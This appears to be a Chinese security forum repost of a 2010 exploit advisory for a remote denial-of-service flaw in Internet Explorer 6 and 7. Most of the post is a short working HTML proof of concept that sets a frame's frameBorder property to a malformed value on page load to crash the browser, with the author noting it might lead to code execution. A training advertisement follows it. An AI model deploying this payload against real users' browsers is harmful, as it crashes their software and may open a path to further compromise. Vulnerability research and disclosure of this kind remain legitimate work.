-
-
[推荐]IE6 / 7 Remote Dos vulnerability
-
发表于:
2010-7-28 23:53
2601
-
[推荐]IE6 / 7 Remote Dos vulnerability
# Exploit Title: IE6 / 7 Remote Dos vulnerability
# Date: 27/07/2010
# Author: Richard leahy
# Version: 6 / 7
# Tested on: Windows Xp Sp3
#category Remote Dos, might lead to code execution.
<html>
<head>
<script>
function dos(){
var e = document.createElement('frame');
var prop = 'frameBorder';
e[prop] = 0123456789;
}
</script>
</head>
<body onload="dos()">
</body>
</html>
[培训]科锐逆向工程师培训第53期2025年7月8日开班!